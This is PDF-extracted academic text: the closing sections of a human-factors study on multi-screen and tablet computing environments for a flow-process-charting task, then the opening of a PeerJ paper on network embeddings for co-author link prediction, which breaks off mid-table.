for a dependent variable. A 0.05 level of significance was applied to all statistical 270 tests. Qualitative data collected from the debrief interview session were analyzed for recurrent 271 themes across participants. These qualitative data were collected to help explain the quantitative 272 results. 273 274 275 3. Results 276 3.1 Performance 277 3.1.1 Time. Mean scenario completion time, with the standard deviation in parentheses, 278 was 596.2 sec (163.4 sec) for condition A, 563.0 sec (213.8 sec) for condition B, and 589.7 sec 279 (195.5 sec) for condition C. ANOVA did not reveal a main effect of Computing Environment on 280 time. 281 3.1.2 Accuracy. Solutions were used to check the accuracy of each participants flow 282 process charts in terms of errors made. Errors included omission errors, incorrect classification 283 of events (e.g., operation vs. transportation), and errors involving the time or distance (for 284 transportation items) for each event. These error counts were treated as ordinal data; 6 median 285 errors were committed by participants when completing scenarios with condition A, 5 median 286 errors with condition B, and 7 median errors with condition C. A Friedman Two-Way ANOVA 287 revealed a main effect of Computing Environment on errors, X2(2) = 6.78, p = 0.034, unadjusted 288 for ties. Post-hoc analysis showed that the difference between conditions B and C was the only 289 significant difference (Wilcoxon Signed Ranks Test). 290 3.2 Workload 291 The NASA TLX data were not normally distributed for the overall composite score or for 292 any of the six subscales, with the exception of mental demand. Therefore, we used non- 293 parametric testing to analyze the workload data. The Friedman Two-Way ANOVA was used to 294 analyze the overall score and subscales and found no statistically significant differences in 295 workload across the three conditions. A summary of the NASA TLX scores is presented in 296 Table 2. 297 298 ---------------------------------------------- 299 Insert Table 2 about here 300 ---------------------------------------------- 301 3.3 Usability 302 The CSUQ is analyzed along an overall score and three subscales, shown in Table 3. 303 Item 9 related to error messages and was excluded from the analysis since there were no error 304 messages presented to participants as part of the study scenario. A copy of the complete CSUQ 305 survey is available in Appendix E. We used ANOVA to test for a main effect of Computing 306 Environment on the system usefulness and information quality subscales. However, the data for 307 overall satisfaction and interface quality failed the normality assumption and so we treated those 308 data as ordinal and used the Friedman Two-Way ANOVA for those two subscales. Statistically 309 significant results were found for overall satisfaction, X2(2) = 12.19, p = 0.002, unadjusted for 310 ties; system usefulness, F(2, 51) = 3.35, p = 0.043; and interface quality, X2(2) = 14.53, p = 311 0.001, unadjusted for ties. For system usefulness, post-hoc analysis (Tukey Pairwise 312 Comparisons) revealed that the significant difference is isolated between conditions A and B. 313 Condition C is not considered different than A or B. For both overall satisfaction and interface 314 quality, post-hoc analysis (Wilcoxon Signed Rank Test) revealed that B is significantly different 315 from A and C. However, A and C are not considered different. 316 ---------------------------------------------- 317 Insert Table 3 about here 318 ---------------------------------------------- 319 320 321 3.4 Qualitative Results 322 During the debrief interview, 15 of 18 participants expressed a clear preference for the 323 computing environment in condition B (dual monitors and one iPad); 3 participants expressed a 324 clear preference for condition A (single monitor); no participants expressed a preference for 325 condition C (single monitor and two iPads). Of the 15 participants who chose the layout in 326 condition B as best, 6 of them explicitly stated that the iPad was unnecessary. Conversely, 3 of 327 the 15 participants expressed a clear preference for the iPad in addition to the dual monitors. 328 When asked what an “optimal” computing environment for their work (i.e., not restricted to 329 choosing one of the three conditions), 16 participants indicated they would prefer two desktop 330 monitors. One participant would prefer a single desktop monitor. And one participant indicated, 331 “the more monitors the better”. Within these 18 responses, five participants expressed a desire 332 or noted an advantage for having a mobile device in addition to fixed monitors for portability of 333 information (three mentioned tablet computers, one mentioned a smart phone, and one 334 mentioned a laptop). 335 336 4. Discussion 337 The results of this investigation into the benefit of using multiple screens and multiple 338 devices were mixed; some of our hypotheses were not supported and others were partially 339 supported. Our first hypothesis was that participants would perform the scenarios in 340 significantly less time and with significantly fewer errors with conditions B and C as compared 341 to condition A. While participants, on average, completed scenarios in less time with condition 342 B, there was no statistically significant difference in time to complete scenarios for the three 343 computing environments. One statistically significant result for errors was isolated between 344 conditions B and C; participants committed significantly less errors when using condition B 345 compared to C. These results suggest marginal support for our first hypothesis, but only for 346 condition B. Condition C was not considered different than the baseline condition A for time 347 and errors. 348 Our second hypothesis was that participants would experience significantly less mental 349 workload when completing the scenarios with conditions B and C as compared to condition A. 350 This hypothesis was not supported. There was no statistically significant difference in the 351 NASA TLX scores when completing scenarios for the three computing environments. However, 352 it is worth noting that condition B was scored, on average, as better than the other conditions 353 especially on the ‘mental demand’ and ‘effort’ subscales. 354 The third hypothesis was that participants would rate the usability of the work area 355 computing set-up in conditions B and C significantly higher as compared to condition A. This 356 hypothesis was partially supported. Condition B was scored significantly higher for overall 357 usability and interface quality compared to both conditions A and C; as well as significantly 358 higher for system usefulness compared to condition A. However, condition C was not scored 359 significantly higher for any of the CSUQ scales compared to the baseline condition A. 360 Our final hypothesis was that there would be no significant differences for any of the 361 dependent variables between condition B and condition C. This hypothesis was not supported. 362 Participants committed significantly fewer errors with condition B compared to condition C. 363 They also rated the overall usability and interface quality as significantly better for the 364 computing environment condition B compared to condition C. 365 4.1 Key Findings 366 A dual monitor desktop with a single tablet computer (condition B) was the ideal 367 computing environment for the “information-rich” engineering problem given to participants. 368 This is supported by converging evidence from the dependent measures as well as the qualitative 369 debrief interviews. A single desktop monitor with two tablet computers (condition C) did not 370 provide any advantage compared to a single desktop monitor (condition A). Overall, these 371 findings provide only marginal support for the concept we set out to investigate, which was the 372 notion that more screens and possibly more devices may help focus one’s attention rather than 373 serve as a distraction, making multiple tasks viewable at a glance across multiple device screens 374 (Thompson, 2014). The finding of a performance and usability advantage of the dual monitors 375 in condition B is consistent with previous studies (Anderson et al., 2004; Poder et al., 2011; 376 Russell & Wong, 2005). A key difference in our study is that we provided a tablet computer in 377 addition to the dual monitors. However, the debrief interviews were mixed as to the usefulness 378 of the third screen provided by the tablet; some participants thought it was not helpful whereas 379 other did find it useful. The complete lack of performance, workload, and usability differences 380 between condition C (single monitor and two tablet computers) and condition A (single monitor) 381 does not support the notion that a multiscreen environment can help focus one’s attention. 382 Indeed, some participants noted that using multiple screens provided by the tablet computer(s) 383 was distracting. Others noted that while they did not hinder their tasks, they did not help. 384 4.2 Limitations and Future Research 385 Our study focused on engineering students completing flow process charts with a race car 386 pit stop scenario as an example of an information-rich task, where the use of multiple screens 387 was potentially useful. A more complex scenario or application area, with a clearer distinction 388 for parsing certain information across screens with distinctly different purposes, may be more 389 amenable to a multiscreen and multi-device environment. For example, a physician that needs to 390 integrate patient data and other information from multiple functions within an EHR and other 391 related clinical information systems may be a more beneficial example to investigate in a future 392 study. Also, our study used Apple iPad tablets; all but one of our participants had experience 393 using tablet computers but only one reported regularly using a iPad. Future research should 394 incorporate other types of tablets and mobile devices, as well as more advanced ones that may 395 better approximate the forgotten power of paper (e.g., Tarun et al, 2013). 396 397 5. Conclusion 398 We designed a study to investigate the potential benefit of multiscreen and multiple 399 device environments using three different computing environment conditions. Scenarios 400 completed with condition B, which included a desktop with dual 19-inch monitors, as well as a 401 single tablet computer with a 9.7-inch display, resulted in significantly less errors compared 402 condition C, which included a desktop with a with a 19-inch monitor, as well as two tablet 403 computers, with 9.7 inch displays. Condition B was also resulted in significantly higher usability 404 ratings compared to condition C and compared to a baseline condition A (single desktop 405 computer with a 19-inch monitor). Our findings are consistent with the literature that show 406 better performance using a dual screen set-up. However, our findings provide only marginal 407 support for the benefit of incorporating additional screens in the form of tablet computers during 408 information-rich, complex tasks. Based on these results, we recommend a computing work 409 environment with dual screen monitors, with an optional tablet computer, for complex and 410 information-rich computing tasks. 411 412 413 414 Acknowledgements 415 A portion of the results from this study was presented at the Human Factors and 416 Ergonomics Society (HFES) International Annual Meeting, Austin, TX, October 9–13, 2017. 417 This work was supported by the Department of Industrial Engineering, J.B. Speed School of 418 Engineering, and the Center for Ergonomics, University of Louisville. 419 420 References 421 Anderson, A., Colvin, J., Tobler, N., & Lindsay, D. (2004). Productivity and multi-screen 422 displays. Rocky Mountain Communication Review, 2, 31-53. 423 ArmyRanger241 [screen name]. (2015). NASCAR Pit Stop at Talledega 2015. Retrieved from 424 https://www.youtube.com/watch?v=GrhsOndLSJQ. 425 Byrd, K. S. & Caldwell, B. S. (2011). Increased memory load during task completion when 426 procedures are presented on mobile screens. Behaviour & Information Technology, 30, 427 643-658. 428 Czerwinski, M., Robertson, G., Meyers, B., Smith, G., Robbins, D., & Tan, D. (2006). Large 429 display research overview. Proceedings of CHI 2006, 69-74. 430 De Backere F., Vanhove, T., Dejonghe, E., Feys, M., Herinckx, T., Vankelecom, J. et al. (2015). 431 Platform for efficient switching between multiple devices in the intensive care unit. 432 Methods Inf.Med., 54, 5-15. 433 Grudin, J. (2001). Partitioning digital worlds: focal and peripheral awareness in multiple monitor 434 use. Proc.CHI 2001, 458-465. 435 Hart, S. & Staveland, L. (1998). Development of the NASA-TLX (Task Load Index): Results of 436 empirical and theoretical research. In P.A.Hancock & N. Meshkati (Eds.), Human Mental 437 Workload (pp. 139-183). North-Holland: Elsevier Science Publishers. 438 Hendy, K. C., Hamilton, K. M., & Landry, L. N. (1993). Measuring subjective workload: When 439 is one scale better than many? Human Factors, 35, 579-601. http://www.youtube.com/watch?v=GrhsOndLSJQ 440 Interstate Batteries. (2012). Inside a NASCAR Pit Stop with Joe Gibbs Racing Pit Crew Coach 441 Mike Lepp. Retrieved from https://www.youtube.com/watch?v=PDSkH7gE6XM. 442 Jokela, T., Ojala, J., & Olsson, T. (2015). A diary study on combining multiple information 443 devices in everyday activities and tasks. In Proceedings of the 33rd Annual ACM 444 Conference on Human Factors in Computing Systems (pp. 3903-3912). ACM. 445 Lewis, J. R. (1995). IBM Computer Usability Satisfaction Questionnaires: Psychometric 446 evaluation and instructions for use. International Journal of Human-Computer 447 Interaction, 7, 57-78. 448 Nygren, T. E. (1991). Psychometric properties of subjective workload measurement techniques: 449 Implications for their use in the assessment of perceived mental workload. Human 450 Factors, 33, 17-33. 451 Poder, T. G., Godbout, S. T., & Bellemare, C. (2011). Dual vs. single computer monitor in a 452 Canadian hospital Archiving Department: a study of efficiency and satisfaction. Health 453 Information Management Journal, 40, 20-25. 454 Rashid, U., Nacenta, M. A., & Quigley, A. (2012). Factors influencing visual attention switch in 455 multi-display user interfaces: A survey. Proceedings of the 2012 International 456 Symposium on Pervasive Displays, 1. 457 Russell, S. E. & Wong, K. (2005). Dual-Screen monitors: a qualitative analysis of their use in an 458 academic library. The Journal of Academic Librarianship, 31, 574-577. 459 Saleem, J. J., Russ, A. L., Justice, C. F., Hagg, H., Ebright, P. R., Woodbridge, P. A. et al. 460 (2009). Exploring the persistence of paper with the electronic health record. 461 Int.J.Med.Inform., 78, 618-628. http://www.youtube.com/watch?v=PDSkH7gE6XM 462 Shin, G. & Hegde, S. (2010). User-preferred position of computer displays: effects of display 463 size. Hum.Factors, 52, 574-585. 464 Simmons, T. (2001). What's the optimum computer display size? Ergonomics in Design, 9, 19- 465 24. 466 Simmons, T. & Manahan, M. (1999). The effects of monitor size on user performance and 467 preference. Proceedings of the Human Factors and Ergonomics Society 43rd Annual 468 Meeting, 1393. 469 Tan, D. S. & Czerwinski, M. (2003). Effects of visual separation and physical continuities when 470 distributing information across multiple displays. Proc.INTERACT 2003, 252-265. 471 Tarun, A., Wang, P., Girouard, A., Strohmeier, P., Reilly, D., & Vertegaal, R. (2013). PaperTab: 472 An Electronic Paper Computer with Multiple Large Flexible Electrophoretic Displays. In 473 Extended Abstracts of ACM CHI’13 Conference on Human Factors in Computing. ACM 474 Press, pp. 3131-3134. 475 Thompson, C. (2014, July 22). How working on multiple screens can actually help you focus. 476 Wired. Retrieved from http://www.wired.com/2014/07/multi-screen-life/ 477 Figure 1 Three experimental conditions for Computing Environment. Condition A had a single desktop computer with a 19-inch monitor (baseline condition). Condition B had a desktop with dual 19-inch monitors, as well as a single tablet computer with a 9.7-inch display. Condition C had a desktop with a 19-inch monitor, as well as two tablet computers, with 9.7 inch displays. Table 1(on next page) Information partition across screens and devices Participants were asked to use flow process charts to document the steps that members of a race car team perform during a pit stop for each of the three experimental conditions for Computing Environment. The table shows how the information needed to complete the scenario was partitioned across the screens and devices for each condition. 1 Table 1 2 Information partition across screens and devices 3 Screen/device Condition A Condition B Condition C 4 Monitor 1 Tutorial video Flow process chart Tutorial video 5 Pit stop video Flow process chart 6 Flow process chart Email access 7 Email access 8 Dimension sheet 9 Monitor 2 N/A Tutorial video N/A 10 Email access 11 Dimension sheet 12 iPad 1 N/A Pit stop video Pit stop video 13 iPad 2 N/A N/A Dimension sheet 14 15 Table 2(on next page) Summary of NASA TLX scores (mean, standard deviation) The table shows workload ratings for each of the six subscales and overall composite score for the NASA TLX. Cond., condition; MD, mental demand; PD, physical demand; TD, temporal demand; Perf., performance; Frust., frustration; total, total composite TLX score, unweighted. 1 Table 2 2 Summary of NASA TLX scores (mean, standard deviation) 3 Cond MD PD TD Perf. Effort Frust. Total 4 A 54.2 (22.1) 21.1 (14.8) 42.2 (17.8) 37.8 (22.7) 51.1 (18.2) 31.7 (25.0) 39.7 (13.3) 5 B 46.7 (21.9) 22.2 (19.7) 39.4 (21.1) 40.6 (28.1) 42.5 (22.2) 31.7 (26.2) 37.2 (14.7) 6 C 48.1 (18.4) 23.6 (18.0) 43.9 (21.7) 41.1 (24.3) 46.9 (20.8) 31.7 (23.8) 39.2 (13.5) 7 Note. Cond., condition; MD, mental demand; PD, physical demand; TD, temporal demand; Perf., performance; Frust., frustration; 8 total, total composite TLX score, unweighted. 9 Table 3(on next page) Usability scores fromthe Computer System Usability Questionnaire (CSUQ) The table shows the usability ratings from the CSUQ. Item 9 was excluded from the analysis as not applicable. Ratings are derived from 7-point Likert-type scales ranging from 1 = strongly disagree to 7= strongly agree. * p values indicate statistically significant findings ( p <0.05). p values reported for system usefulness and information quality are from analysis of variance (ANOVA). p values reported for overall satisfaction and interface quality are from the Friedman Two-Way ANOVA, unadjusted for ties. 1 Table 3 2 Usability scores from the Computer System Usability Questionnaire (CSUQ) 3 Score Condition A Condition B Condition C p value 4 Overall satisfaction (items 1-19) 5.0 (1.0) 5.8 (1.0) 5.3 (1.0) 0.002* 5 System usefulness (items 1-8) 5.0 (1.1) 5.9 (1.0) 5.2 (1.0) 0.043* 6 Information quality (items 10-15) 5.1 (1.0) 5.6 (1.0) 5.5 (0.9) 0.313 7 Interface quality (items 16-18) 4.7 (1.5) 5.9 (1.1) 5.1 (1.3) 0.001* 8 Note. Item 9 was excluded from the analysis as not applicable. Ratings are derived from 7-point Likert-type scales ranging from 1 = 9 strongly disagree to 7= strongly agree. *p values indicate statistically significant findings (p<0.05). p values reported for system 10 usefulness and information quality are from analysis of variance (ANOVA). p values reported for overall satisfaction and interface 11 quality are from the Friedman Two-Way ANOVA, unadjusted for ties. 12 work_zbpzx43flfaifddpftczprcome ---- Dual network embedding for representing research interests in the link prediction problem on co-authorship networks Dual network embedding for representing research interests in the link prediction problem on co-authorship networks Ilya Makarov1,2, Olga Gerasimova1, Pavel Sulimov1 and Leonid E. Zhukov1 1 School of Data Analysis and Artificial Intelligence, National Research University Higher School of Economics, Moscow, Russia 2 Faculty of Computer and Information Science, University of Ljubljana, Ljubljana, Slovenia ABSTRACT We present a study on co-authorship network representation based on network embedding together with additional information on topic modeling of research papers and new edge embedding operator. We use the link prediction (LP) model for constructing a recommender system for searching collaborators with similar research interests. Extracting topics for each paper, we construct keywords co-occurrence network and use its embedding for further generalizing author attributes. Standard graph feature engineering and network embedding methods were combined for constructing co-author recommender system formulated as LP problem and prediction of future graph structure. We evaluate our survey on the dataset containing temporal information on National Research University Higher School of Economics over 25 years of research articles indexed in Russian Science Citation Index and Scopus. Our model of network representation shows better performance for stated binary classification tasks on several co-authorship networks. Subjects Artificial Intelligence, Data Mining and Machine Learning, Digital Libraries, Network Science and Online Social Networks, World Wide Web and Web Science Keywords Co-occurrence network, Network embedding, Machine learning, Link prediction, Recommender systems, Co-authorship networks INTRODUCTION Nowadays, researchers struggle to find relevant scientific contributions among large variety of international conferences and journal articles. In order not to miss important improvements in various related fields of study, it is important to know the current state-of-art results while not reading all the papers tagged by research interests. One of the solutions is to search for the most “important” articles taking into account citation or centrality metrics of the paper and the authors with high influence on specific research field (Liang, Li & Qian, 2011). However, such method does not include collaborative patterns and previous history of research publications in co-authorship. It also does not measure the author professional skills and the ability to publish research results according to paper influence metrics, for example, journal impact factor. We study the problem of finding collaborator depending on his/her research community, the quality of publications and structural patterns based on co-authorship network suggested by Newman (2004a, 2004b). Early unsupervised learning approaches How to cite this article Makarov I, Gerasimova O, Sulimov P, Zhukov LE. 2019. Dual network embedding for representing research interests in the link prediction problem on co-authorship networks. PeerJ Comput. Sci. 5:e172 DOI 10.7717/peerj-cs.172 Submitted 20 September 2018 Accepted 28 December 2018 Published 21 January 2019 Corresponding author Ilya Makarov, iamakarov@hse.ru Academic editor Diego Amancio Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.172 Copyright 2019 Makarov et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.172 mailto:iamakarov@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.172 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ for community detection in research networks were studied in Morel et al. (2009), Cetorelli & Peristiani (2013), Yan & Ding (2009), and Velden & Lagoze (2009). A review on social network analysis and network science can be found in Wasserman & Faust (1994), Barabási & Pósfai (2016), and Scott (2017). We focus on the link prediction (LP) problem (Liben-Nowell & Kleinberg, 2007) in order to predict links in temporal networks and restore missing edges in complex networks constructed over noisy data. The LP algorithms can be used to extract the missing link or to detect abnormal interactions in a given graph, however, the most suitable case is to use LP for predicting the most probable persons for future collaboration, which we state as a problem of recommending a co-author using LP ranking (Li & Chen, 2009). Our model is designed to predict whether a pair of nodes in a network would have a connection. We can also predict the parameters of such an edge in terms of publication quality or number of collaborators corresponding to the predicted link (Makarov et al., 2019a, 2019b). In general, LP algorithms are widely used in several applications, such as web linking (Adafre & De Rijke, 2005), search for real-world friends on social networks (Backstrom & Leskovec, 2011), citation recommender system for digital libraries (He et al., 2010). A complete list of existing applied LP techniques can be found in Srinivas & Mitra (2016). Recently, the improvement of machine learning techniques shifted the attention from manual feature engineering to the vectorized information representation. Such methods have been successfully applied for natural language processing and now are tested on network topology representation despite the fact that an arbitrary graph could not be described by its invariants. The approach of representing network vertices by a vector model depending on actor’s neighborhood and similar actors is called graph (network) embedding (Perozzi, Al-Rfou & Skiena, 2014). The current progress of theoretical and practical results on network embeddings (Perozzi, Al-Rfou & Skiena, 2014; Tang et al., 2015; Chang et al., 2015; Grover & Leskovec, 2016) shows state-of-art performance on such problems as multi-class actor classification and LP. Although, the existing methods use not only structural equivalence and network homophily properties, but also the actor attributes, such as labels, texts, images, etc. A list of surveys on graph embedding models and applications can be found in Cai, Zheng & Chang (2018), Cui et al. (2018), Goyal & Ferrara (2018), and Chen et al. (2018). In this paper, we study a co-authorship recommender system based on co-authorship network where one or more of the coauthors belong to the National Research University Higher School of Economics (NRU HSE) and the co-authored publications are only those indexed in Scopus. We use machine learning techniques to predict new edges based on network embeddings (Grover & Leskovec, 2016; Wu & Lerman, 2017) and edge characteristics obtained from author attributes. We compare our approach with state-of-the-art algorithms for the LP problem using structural, attribute and combined feature space to evaluate the impact of the suggested approach on the binary classification task of predicting links in co-authorship network. Such an obtained system could be applied for expert search, recommending collaborator or scientific adviser, and searching for relevant research publications similar to the work proposed in Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 2/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ Makarov, Bulanov & Zhukov (2017) and Makarov et al. (2018a). In what follows, we describe solution to the LP problem leading to evaluation of our recommender system based on co-authorship network embeddings and manually engineered features for HSE researchers. RELATED WORK Link prediction The LP problem was stated in Liben-Nowell & Kleinberg (2007), in which Liben-Nowell and Kleinberg proposed using node proximity metrics. The evaluation of the proposed metrics for large co-authorship networks showed promising results for predicting future links based on network topology without any additional information on authors. Unsupervised structural learning was proposed in Tang & Liu (2012). Gao, Denoyer & Gallinari (2011) presented temporal LP based on node proximity and its attributes determined by the content using matrix factorization. Two surveys on LP methods describe core approaches for feature engineering, Bayesian approach and dimensionality reduction were presented in Hasan & Zaki (2011), Lü & Zhou (2011). Survey on LP was published in Wang et al. (2015). The simplest baseline solution using network homophily is based on common neighbors or other network similarity scores (Liben-Nowell & Kleinberg, 2007). However, the Gao et al. (2015) that the similarity measures are not robust to the network global properties and, thus, could noise the prediction model with similarity scores only. The impact of the attribute-based formation in social networks was considered in Robins et al. (2007) and McPherson, Smith-Lovin & Cook (2001). All these observations require feature engineering depending on the domain. Graph-based recommender systems formulated via LP problem were suggested in Chen, Li & Huang (2005), Liu & Kou (2007), and Li & Chen (2009). In Kossinets & Watts (2009), studied the effect of homophily in a university community. They considered temporal co-authorship network accompanied with author attributes and concluded the influence of not only structural proximity, but also author homophily for the social network structure. Another approach focusing on interdisciplinary collaboration inside the University was presented in Cho & Yu (2018). The authors used the existing co-authorship network and academic information for University of Bristoll and proposed a new LP model for co-authorship prediction and recommendation. Kong et al. (2018) developed a scientific paper recommender system called VOPRec. However, in contrast to our work they constructed vector representation of research papers in citation networks. Their system uses both text information represented with word embedding to find papers of similar research interest and structural identity converted into vectors to find papers of similar network topology. To combine text and structural informations with the network, vector representation of article can be learned with network embedding. Network embedding In general, knowledge retrieval and task-dependent feature extraction would require domain-specific expert to construct a real-value feature vector for nodes and edges Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 3/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ representation. The quality of such an approach will be influenced by particular tasks and expert work, while not being scalable for large noisy networks. Recently, the theory of hidden representations has impacted on machine learning and artificial intelligence. It shifted the attention from manual feature engineering to defining loss function and then solving optimization task. The early works on network vectorized models were presented in Local Linear Embedding (Roweis & Saul, 2000), IsoMAP (Tenenbaum, De Silva & Langford, 2000), Laplacian Eigenmap (Belkin & Niyogi, 2002), Spectral Clustering (Tang & Liu, 2011), MFA (Yan et al., 2007), and GraRep (Cao, Lu & Xu, 2015). These works try to embed the networks into real-value vector space using several proximity metrics. However, development of representation learning for networks was in stagnation due to the non-robust and non-efficient machine learning methods of dimensionality reduction based on network matrix factorization or spectral decomposition. These methods were not applicable for large networks and noisy edge and attribute data providing low accuracy and having high time complexity of constructing embedding. The modern methods of network embedding try to improve the performance on several typical machine learning tasks using conditional representation of a node based on its local and global neighborhood defined via random walking. The first-order and second-order nodes proximity were suggested in LINE (Tang et al., 2015) and SDNE (Wang, Cui & Zhu, 2016) models. Generalizing this approach, DeepWalk (Perozzi, Al-Rfou & Skiena, 2014) and node2vec (Grover & Leskovec, 2016) algorithms use Skip-gram model (Mikolov et al., 2013) based on simulation of breadth-first sampling and depth-first sampling. Although, in Carstens et al. (2017), Carstens et al. showed some drawbacks of node2vec (Grover & Leskovec, 2016) graph embedding, it still remained competitive structural-only embedding for representing both, homophily and structural equivalence in the network. Its generalization on global network representation learning from Wu & Lerman (2017) shows comparable results with the original model. Several works cover the node attributes, such as label and text content (see TADW; Yang et al., 2015, LANE; Huang, Li & Hu, 2017). In TriDNR paper, Pan et al. (2016) proposed to separately learn structural embedding from DeepWalk (Perozzi, Al-Rfou & Skiena, 2014) and content embedding via Doc2Vec (Le & Mikolov, 2014). On the contrary, ASNE (Liao et al., 2017) learns combined representations for structural and node attribute representation using end-to-end neural network. We focus on graph embedding and feature engineering methods applied to an LP task on a particular network, consisting of HSE researchers co-authored at least one paper with additional attributes representing authors. Using network features only fails to include the information about actors obtained from the other sources, thus decreasing efficiency of network embeddings. We aim to include information on feature space of author’s research interests using data from the Scopus digital library containing manually input and automatically selected keywords for each research article. Based on this information, we constructed keywords co-occurrence network and consider its embedding for further generalizing author attributes. Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 4/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ DATASET DESCRIPTION AND PREPROCESSING We use the NRU HSE portal (National Research University Higher School of Economics, 2017) containing information on research papers co-authored by at least one HSE researcher, which were later uploaded to the portal by one of co-authors. The HSE database contains information on over 7,000 HSE researchers published over 31,000 research papers. The portal site contains web interface for the researchers to extract metadata of publications for a given time period and could be used by external researchers. The database records contain information on title, list of authors, keywords, abstract, year and place, journal/conference and publishing agency, and indexing flags for Scopus, Web of Science (WoS) Core Collection and Russian Science Citation Index (RSCI). Unfortunately, the database has no interface for managing bibliography databases and has no integration with synchronizing of indexing digital libraries compared to Scholar Google or personal researcher profile management services such as ResearcherID or Orcid. As a consequence, a large amount of noisy data occurs due to such problems as author name ambiguity or incorrect/incomplete information on the publications. In order to resolve the ambiguity, we considered standard disambiguation approaches for predicting necessity to merge authors. We used Levenshtein distance (useful for records with one-two error letters) for abbreviated author last and first names and then validated by two thresholds whether to merge two authors with the same abbreviation in the database based on cosine similarity and common neighbors metrics. The threshold values have been found manually via validation on small labeled set of ambiguous records. The number of authors with ambiguous writing does not exceed 2% of the whole database. We have also removed all non-HSE authors due to lack of information on their publications in HSE dataset. We also retrieved the Scopus database of research papers co-authored by researchers from NRU HSE and indexed by Elsevier (2018). The database contains information on paper author list, document title, year, source title, volume, issue, pages, source and document type, DOI, author keywords, index keywords. We also added the information on research interests based on Scopus subject categories for the journals, in which authors have published their articles. We manually inputted the research interest list according to RSCI categorization in order to fill the lack of keywords and attributes for the papers. We then stated the problem of indexing author research interests in terms of keywords attached to paper description in both databases, and retrieved from HSE dataset using the BigARTM (Vorontsov et al., 2016) topic modeling framework. For the Scopus dataset, we use automatically chosen keywords previously prepared by the service together with manually input by authors list of keywords. We also uses additional keywords written in terms of subject categories of journals and proceedings according to the indexing in Scopus and WoS research paper libraries. These two datasets (HSE, Scopus) have common papers; however HSE dataset contains many noisy data and, unfortunately, low-level publications not indexed outside RSCI, while Scopus contains precise information on 25% number of papers and exact research Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 5/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ interest representation while lacking weak connections on authors written only poor- quality papers. We visualized the HSE network with author names as node labels shown in the Fig. 1 while visualizing edge width as the cumulative quantity of joint publications based on the Figure 1 Visualization of HSE co-authorship network. We plot the whole HSE co-authorship network (A) and its subgraphs induced by local proximities around influential persons from our university such as rector Kuzminov Y.I. (B), first vice-rector responsible for science Gokhberg L.M. (C), and university research supervisor Yasin E.G. (D). Full-size DOI: 10.7717/peerj-cs.172/fig-1 Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 6/20 http://dx.doi.org/10.7717/peerj-cs.172/fig-1 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ papers’ quartiles and their number. In particular, we plotted the whole network structure (Fig. 1A) and zoomed parts corresponding dense communities with the most influential persons from our university such as rector Kuzminov Y.I. (Fig. 1B), first vice-rector responsible for science Gokhberg L.M. (Fig. 1C), and university research supervisor Yasin E.G. (Fig. 1D). It is easy to see that rector co-authors are people responsible for core direction of university development and vice rectors realizing university strategy in research, education, government, expert, and company areas of collaboration. On the other hand, from dense subgraphs one can find exact matches of university staff departments, such as research institutes, such as Institute for Industrial and Market Studies headed by Yakovlev A.A. or Institute for Statistical Studies and Economics of Knowledge headed by L.M. Gokhberg. We show that network could visualize the most important administrative staff units and their heads thus giving insight on the connection of publication activity and administrative structure of HSE university. FEATURE ENGINEERING Our new idea was to obtain additional edge attributes that were embed based on keywords network as a part of model evaluation. We constructed the network of stemmed keywords co-occurrence. To construct this network, we used the principle that two nodes were connected if corresponding keywords occurred in the same paper. For a given list of keywords, we built standard node2vec embedding (Grover & Leskovec, 2016). Next, for each author the most frequent and relevant keyword was defined, and its embedding was used as node additional feature vector for our LP tasks. We considered the problem of finding authors with similar interests to a selected one as collaboration search problem. In terms of social network analysis, we studied the problem of recommending similar author as LP problem. We operate with authors similarity and use similarity scores described in Liben-Nowell & Kleinberg (2007) as baseline for network descriptors for pairs of nodes presented in Table 1. So, we represented each node by vector model of author attributes using manually engineered features such as HSE staff information and publication activity represented by centralities of co-authorship network and descriptive statistics. We added graph embeddings for author research interests and node proximity and evaluated different combinations of models corresponding to node feature space representation. LINK EMBEDDINGS To use node2vec, we obtained the vector node representations. The node2vec embedding parameters were chosen via ROC–area under the curve (AUC) optimization over embedding size with respect to different edge embedding operators. For edge embedding we applied specific component-wise functions representing edge to node embeddings for source and target nodes of a given edge. This model was suggested in Grover & Leskovec (2016), in which four functions for such edge embeddings were presented (see first four rows in Table 2). We leave an evaluation of the approaches from Abu-El-Haija, Perozzi & Al-Rfou (2017), which use bi-linear form learning from reduced by deep neural Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 7/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ network node embedding, for the future work while also working on a new model of joint node-edge graph embedding, similar to (Goyal et al., 2018). Presented in the paper model suggests simple generalization of the idea of pooling first-order neighborhood of nodes while constructing edge embedding operator, which is much faster than dimensionality reduction approaches. We evaluated our model on two additional functions involving not only edge source and target node representations, but also their neighborhood representations as average over all the nodes in first-order proximity. These measures were first presented in Makarov et al. (2018b) but were not properly evaluated. The resulting list of link embeddings is presented in Table 2. For each author, we also chose the most frequent keyword in the co-occurrence network and then constructed general embedding using node2vec with automatically chosen parameters. Table 1 Similarity score for a pair of nodes u and v with local neighborhoods N(u) and N(v) correspondingly, and for vectors corresponding to two authors research interests X and Y. Similarity metric Definition Common neighbors jN(u) \ N(v)j Jaccard coefficient jNðuÞ \ NðvÞj jNðuÞ [ NðvÞj Adamic-Adar score X w2NðuÞ\NðvÞ 1 ln jNðwÞj Preferential attachment jN(u)j · jN(v)j Graph distance Length of shortest path between u and v Metric score 1 1 þ jjx � yjj Cosine score ðx; yÞ jjxjjjjyjj Pearson 